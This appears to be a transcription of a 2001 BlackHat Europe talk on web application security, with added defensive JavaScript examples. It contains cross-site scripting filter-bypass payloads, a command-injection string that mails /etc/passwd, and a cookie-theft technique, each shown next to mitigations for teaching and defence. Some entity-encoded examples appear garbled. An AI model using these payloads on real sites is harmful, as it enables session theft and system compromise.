Bh europe-01-grossman


  1. Web Application Security
     "The Land that Information Security Forgot."
     BlackHat Europe 2001
     Jeremiah Grossman, WhiteHat Security
     2001 (c) WhiteHat Security, Inc.
  2. Topics
     Web Application Security Landscape
     Common Web Application Security Mistakes
     Web Application Attack Methodologies
       - Information & Discovery
       - Input Manipulation / Parameter Tampering
       - Authentication / Authorization
       - System Mis-Configurations
  3. What is a Web Application?
     A web application or web service is a software application that is accessible using a web browser or HTTP(S) user agent.
  4. Layers
  5. What is Web Application Security?
     Simply, Web Application Security is "the securing of web applications."
  6. Firewall
  7. SSL
  8. Common Web Application Security Mistakes
  9. Trusting Client-Side Data
     DO NOT TRUST CLIENT-SIDE DATA!
     Identify all input parameters that trust client-side data.
  10. Unescaped Special Characters
     ! @ $ % ^ & * ( ) - _ + ` ~ | [ ] { } ; : " ? / , . > <
     Check for: unescaped special characters within input strings.
  11. HTML Character Filtering
     Proper handling of special characters:
       >  =>  &gt;
       <  =>  &lt;
       "  =>  &quot;
       &  =>  &amp;
     Null characters (%00) should all be removed.
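As an added example (not code from the original deck), slide 11's table as a function, together with the ordering mistake the table hides: "&" has to be encoded in the same pass as the other three characters, otherwise the entities produced by an earlier replacement get encoded a second time. The null handling covers both the raw byte and the %00 form the slide names, which is what arrives when a value has not been URL-decoded yet.

```javascript
// Output encoding as described on slide 11: > < " & become entities and
// null characters are removed. Added example, not code from the original deck.
const HTML_ENTITY_MAP = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;' };

// One regex pass over all four characters. Doing it as four successive
// replace() calls with "&" last turns "<" into "&lt;" and then into "&amp;lt;".
function escapeHtml(input) {
  // Slide 11: null characters should all be removed. Both the raw byte and the
  // literal "%00" sequence are dropped, so the result is safe whether or not
  // the caller URL-decoded the value first.
  const withoutNulls = String(input).replace(/\x00|%00/gi, '');
  return withoutNulls.replace(/[&<>"]/g, ch => HTML_ENTITY_MAP[ch]);
}

// The order-dependent version, kept only to show the failure mode.
function escapeHtmlWrongOrder(input) {
  return String(input)
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/&/g, '&amp;'); // runs last, so it mangles the entities made above
}

// Quick self-check for a value about to be placed in HTML text: after escaping,
// no tag-opening or attribute-closing characters may remain.
function containsRawMarkup(s) {
  return /[<>"]/.test(s);
}
```

The single-pass form is also the one to use in attribute context; the slide's table does not list the single quote, so a value placed inside a single-quoted attribute needs that character added to the map as well.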
  12. More mistakes...
     Authentication mechanisms using technologies such as JavaScript or ActiveX.
     Lack of re-authenticating the user before issuing new passwords or performing critical tasks.
     Hosting of uncontrolled data on a protected domain.
  13. Information & Discovery
       - Spidering / Site Crawling
       - Identifiable Characteristics
       - Errors and Response Codes
       - File / Application Enumeration
       - Network Reconnaissance
  14. Spidering / Site Crawling
     Site map, service map, documentation; hidden services, CGIs and forms, email addresses.
     Tools: wget
  15. Identifiable Characteristics
     Comment lines, URL extensions, meta tags, cookies, client-side scripting languages.
  16. Error and Response Codes
     HTTP response headers; error messages.
  17. File / Application Enumeration
     Commonly referred to as "forced browsing" or "CGI scanning".
     Directory browsing; index listings.
     Tools: Whisker
  18. Network Reconnaissance
     WHOIS / ARIN; port scan (Nmap or hping); reverse DNS; DNS zone transfer (dig).
  19. Input Manipulation / Parameter Tampering: "Twiddling Bits."
       - Cross-Site Scripting
       - Filter-Bypass Manipulation
       - OS Commands
       - Meta Characters
       - Path / Directory Traversal
       - Hidden Form Field Manipulation
       - HTTP Headers
  20. Cross-Site Scripting
     A bad name given to a dangerous security issue.
     The attack targets the user of the system rather than the system itself.
     Outside client-side languages execute within the user's web environment with the same level of privilege as the hosted site.
  21. Client-Side Scripting Languages
     DHTML (HTML, XHTML, HTML x.0), JavaScript (1.x), Java (applets), VBScript, Flash, ActiveX, XML/XSL, CSS
  22. Accessing the DOM & Outside the DOM
     Client-side languages possess an enormous amount of power to access and manipulate the Document Object Model (DOM) within a browser.
     Complex and diverse interconnections create an increased level of access within the DOM.
     That increased level of access lets script read and modify DOM data, ranging from background colours, to a file on your system, and beyond to executing system calls.
  23. CSS Danger: "The Remote Launch Pad."
     (In this deck "CSS" abbreviates cross-site / client-side scripting, not Cascading Style Sheets.)
     Successfully CSS a user via a protected domain.
     Utilizing a client-side utility (JavaScript, ActiveX, VBScript, etc.), exploit a browser hole to download a trojan/virus.
     The user is unknowingly infected/compromised within a single HTTP page load.
  24. Dangerous HTML: "it's all bad."
     <APPLET> <BODY> <EMBED> <FRAME> <FRAMESET> <HTML> <IFRAME> <IMG> <LAYER> <ILAYER> <META> <OBJECT> <SCRIPT> <STYLE>
     Attribute danger list (any HTML tag that has these attributes): STYLE, SRC, HREF, TYPE
  25. Filter Bypassing: "JavaScript is a Cockroach"
     There are all kinds of input filters web applications implement to sanitize data.
     This section demonstrates many known ways input filters can be bypassed to perform malicious functions such as cross-site scripting, browser hijacking, cookie theft, and others.
     Client-Side Scripting (CSS) attacks require the execution of JavaScript, Java, VBScript, ActiveX, Flash or some others.
     We assume that these web applications accept HTML, at least in a limited sense.
  26. Testing the Filters
     Submit all the raw HTML tags you can find, then view the output results.
     Combine HTML with tag attributes such as SRC, STYLE, HREF and OnXXX (JavaScript event handlers).
     This shows what HTML is allowed, what the changes were, and possibly what dangerous HTML can be exploited.
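The slide 26 procedure as an added example (not code from the original deck): build the probe set from the slide 24 tag list and the SRC/HREF/STYLE/OnXXX attributes, run every probe through a filter, and classify the result as allowed, stripped or modified. The filter used here is a stand-in that implements only the slide 27 advice (drop script tags); the tag and attribute values are the deck's, the classification names are assumptions.

```javascript
// Filter probing as described on slide 26. Added example, not from the deck;
// scriptTagOnlyFilter stands in for whatever filter the application really has.

const TAGS = ['SCRIPT', 'IMG', 'IFRAME', 'OBJECT', 'EMBED', 'STYLE', 'META', 'BODY', 'A'];
const ATTRS = {
  SRC: 'javascript:alert(1)',
  HREF: 'javascript:alert(1)',
  STYLE: 'background:url(javascript:alert(1))',
  onload: 'alert(1)',
  onmouseover: 'alert(1)',
};

// Probe set: each bare tag, then each tag combined with each attribute.
function buildProbes() {
  const probes = [];
  for (const tag of TAGS) {
    probes.push(`<${tag}>x</${tag}>`);
    for (const [attr, value] of Object.entries(ATTRS)) {
      probes.push(`<${tag} ${attr}="${value}">`);
    }
  }
  return probes;
}

// Compare what went in with what came out.
//   allowed  - survived byte for byte (exploitable if the tag/attribute is dangerous)
//   stripped - no markup left at all
//   modified - something changed; inspect by hand, it may still be exploitable
function classify(probe, output) {
  if (output === probe) return 'allowed';
  if (!/[<>]/.test(output)) return 'stripped';
  return 'modified';
}

// Run every probe through the filter under test; returns probe -> verdict.
function runProbes(filter) {
  const report = new Map();
  for (const probe of buildProbes()) report.set(probe, classify(probe, filter(probe)));
  return report;
}

// Stand-in filter: the slide 27 solution and nothing else.
function scriptTagOnlyFilter(html) {
  return html.replace(/<\/?script[^>]*>/gi, '');
}

// The list a tester actually wants: probes the filter let through untouched.
function allowedProbes(filter) {
  return [...runProbes(filter)]
    .filter(([, verdict]) => verdict === 'allowed')
    .map(([probe]) => probe);
}
```

Against the script-tag-only filter every SCRIPT probe comes back stripped and every other probe comes back allowed, which is exactly the gap the following slides exploit.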
  27. SCRIPT Tag
     Description: The script tag is the simplest form of inputting JavaScript.
     Exploit: <SCRIPT>alert('JavaScript Executed');</SCRIPT>
     Solution: replace all "script" tags (necessary, but as the following slides show, nowhere near sufficient).
  28. SRCing the JavaScript Protocol
     Description: The javascript: protocol executes the expression entered after the colon. Netscape tested.
     Exploit: <IMG SRC="javascript:alert('JavaScript Executed');">
     Solution: Replace "javascript" strings in all SRC & HREF attributes in HTML tags with another string, e.g. <IMG SRC="java_script:alert('JavaScript Executed');"> will render this script useless.
     Further information: Any HTML tag with a SRC attribute will execute this script on page load or on link activation.
     As a further protocol pattern match, the keywords "livescript" and "mocha" (Netscape code names for JavaScript) must also be replaced, for they hold the same possibilities.
  29. SRCing the JavaScript Protocol with HTML Entities
     Description: As another derivative of the previous, decimal HTML entities within these strings can cause filter bypass.
     Exploit: <IMG SRC="javasc ript:alert('JavaScript Executed');"> where the gap inside "javascript" stands for a decimal HTML entity: the plain string filter of slide 28 never sees the word "javascript", but the browser decodes the entity before it looks at the scheme.
     Replacing that entity with entities 10, 11, 12 or 13 (line feed, vertical tab, form feed, carriage return) will also succeed.
     Hex instead of decimal HTML entities will also bypass input filters and execute: <IMG SRC="javasc ript:alert('JavaScript Executed');">
     As will placing multiple zeros in front of the entity number: <IMG SRC=javasc ript:alert('JavaScript Executed');>
     Solution: Decode these entities within the string, then do your further pattern matching.
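Slides 28 and 29 side by side, as an added example that is not code from the deck: the slide 28 string replacement, the slide 29 bypasses (decimal, hex and zero-padded numeric entities, and entities 10 to 13 inside the scheme name), and the slide 29 solution, which decodes and strips before matching the scheme. The scheme list is the deck's (javascript, livescript, mocha); the slide 30 "&{...}" form is checked in the same place. Attribute extraction by regex and the sample tags are assumptions.

```javascript
// Slide 28 blacklist beside an entity-aware scheme check (slide 29 solution).
// Added example, not code from the original deck.

// Slide 28 solution, as written: a plain string replacement.
function naiveFilter(html) {
  return html.replace(/javascript/gi, 'java_script');
}

// Decode numeric character references: &#114; &#x72; &#0000114; and, as the
// browsers of 2001 accepted, the same forms without the trailing semicolon.
function decodeNumericEntities(s) {
  return s.replace(/&#(x[0-9a-f]+|[0-9]+);?/gi, (match, code) => {
    const cp = /^x/i.test(code) ? parseInt(code.slice(1), 16) : parseInt(code, 10);
    return cp <= 0x10ffff ? String.fromCodePoint(cp) : match;
  });
}

// Schemes the deck names on slide 28 (including the Netscape code names).
const SCRIPT_SCHEMES = ['javascript', 'livescript', 'mocha'];

// Normalise an attribute value the way a browser does before reading the
// scheme: decode entities, then drop control characters and whitespace
// (this is what makes &#10; through &#13; inside "javascript" vanish).
function isScriptUrl(value) {
  const v = decodeNumericEntities(value).replace(/[\x00-\x20]/g, '').toLowerCase();
  if (v.startsWith('&{')) return true;     // slide 30: Netscape "&{expr};" form
  const colon = v.indexOf(':');
  if (colon === -1) return false;           // relative URL, no scheme at all
  return SCRIPT_SCHEMES.includes(v.slice(0, colon));
}

// Pull every SRC= / HREF= value (quoted or bare) out of a fragment and return
// the ones that resolve to a script scheme after normalisation.
function findScriptUrls(html) {
  const re = /\b(src|href)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
  const hits = [];
  for (const m of html.matchAll(re)) {
    const value = m[2] ?? m[3] ?? m[4];
    if (isScriptUrl(value)) hits.push(value);
  }
  return hits;
}
```

The point of `findScriptUrls` is not a better blacklist but a check on the decoded value; the same normalisation is what you would put in front of an allowlist of permitted schemes (http, https, relative) if the application must accept user-supplied URLs at all.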
  30. Ampersand and Curly
     Description: Obscure Netscape JavaScript execution line; the exact syntax is needed to execute.
     Exploit: <IMG SRC="&{alert('JavaScript Executed')};">
     Solution: <IMG SRC="XXalert('JavaScript Executed')};"> or something similar (replace the leading "&{") will nullify the problem.
  31. Style Tag Conversion
     Description: Turn a style tag into a JavaScript expression.
     Exploit: <STYLE TYPE="text/javascript">JS EXPRESSION</STYLE>
     Solution: Replace the "javascript" string with "java_script" and all should be fine.
     Exploit: Import dangerous CSS: <STYLE TYPE="text/css">@import url(http://server/very_bad.css);</STYLE>
     Solution: Filter and replace the "@import".
     Exploit: Import a JavaScript expression through a style tag (IE hole): <STYLE TYPE="text/css">@import url(javascript:alert('JavaScript Executed'));</STYLE>
     Solution: Again, filter and replace both the "@import" and the "javascript:", just to be safe.
  32. Twiddling Bits
     OS Commands; Meta Characters; Path / Directory Traversal
  33. Power of the Semi-Colon: piping input to the command line
     OS Commands
     Normal:
     Injected: ;+sendmail+/etc/passwd (the "+" is the URL encoding of a space; the ";" ends the intended command and starts the attacker's)
     Shell pipes and redirects can also be used.
  34. Power of the Semi-Colon: piping input to the command line
     Meta Characters
     Normal: *
  35. Power of the Semi-Colon: piping input to the command line
     Path / Directory Traversal
     Normal:
  36. More bits...
     Hidden Form Field Manipulation
     HTTP Headers
  37. Authentication / Authorization: "Hand in the cookie jar."
     Cookies are restricted to domains; any data hosted on the restricted domain can access the cookie data.
     JavaScript expression: "document.cookie", sent off-site with window.open or document.img.src.
     Hidden form data is passed to a CGI through a GET request to an off-domain host.
  38. System Mis-Configurations: "patches, patches, and more patches..."
     Vendor patches; default accounts.
     Check:
       - Web server permissions by directory browsing
       - Software version from discovery
       - Known default accounts in commercial platforms
       - BugTraq
       - Anonymous FTP open on the web server
  39. Introducing OWASP
     Open Web Application Security Project, http://www.owasp.org
     The "Open Web Application Security Project" or OWASP is a community effort focused on defining recommendations, specifications and methodologies for designing, developing, deploying and testing the security of web-enabled applications or web services.
     OWASP is based on an idea from the participants of the www-mobile-code mailing list at securityfocus.com.
     You can join the mailing list by
  40. Thank You. Questions?
     Jeremiah Grossman, WhiteHat Security